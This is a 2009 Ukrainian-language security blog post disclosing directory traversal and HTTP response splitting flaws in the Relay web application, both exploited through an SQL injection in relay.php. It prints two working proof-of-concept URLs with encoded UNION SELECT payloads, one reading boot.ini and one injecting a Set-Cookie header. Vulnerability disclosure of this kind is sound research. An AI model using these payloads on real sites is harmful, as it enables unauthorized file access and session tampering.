Нові уразливості в Relay

23:53 17.02.2009

Минулого року я вже писав про уразливості в Relay. Учора, 16.02.2009, я виявив дві нові уразливості в Relay - Directory Traversal та HTTP Response Splitting. Обидві уразливості пов’язані з однією SQL Injection в Relay, про яку я писав торік. Дані дві атаки проводяться через SQL ін’єкцію.

Якщо HTTP Response Splitting через SQL Injection я раніше вже зустрічав, то Directory Traversal через SQL Injection я виявив вперше (саме в Relay). Ідею подібної атаки мені підкинув Alex на прикладі дірки на http://referat.com.ua.

Подібні атаки відрізняються від считування файлів засобами СУБД (як LOAD_FILE в MySQL) в тому, що вони не залежать від прав користувача на роботу з файловою системою. І тому дані атаки можуть застосовуватися для обходу обмеження на роботу з файловою системою в СУБД.

Directory Traversal (через SQL Injection):

http://site/relay/relay.php?relay=getFile&fileid=-1%20union%20select%201,char(98,111,111,116,46,105,110,105),char(99,58),char(47,102,105,108,101,115,116,111,114,101),1,1,1,1,1,1,1,1,1,1

Для отримання файла boot.ini. На інших ОС можна отримати інші файли.

HTTP Response Splitting (через SQL Injection):

http://site/relay/relay.php?relay=getFile&fileid=-1%20union%20select%201,1,1,char(47,102,105,108,101,115,116,111,114,101),char(10,83,101,116,45,67,111,111,107,105,101,58,32,110,97,109,101,61,118,97,108,117,101,59,32,112,97,116,104,61,47,59),1,1,1,1,1,1,1,1,1

Для встановлення кукіса.

Вразлива версія Relay beta 1.0 (та попередні версії). Про уразливості розробникам веб додатка я повідомлю найближчим часом.


Leave a Reply

You must be logged in to post a comment.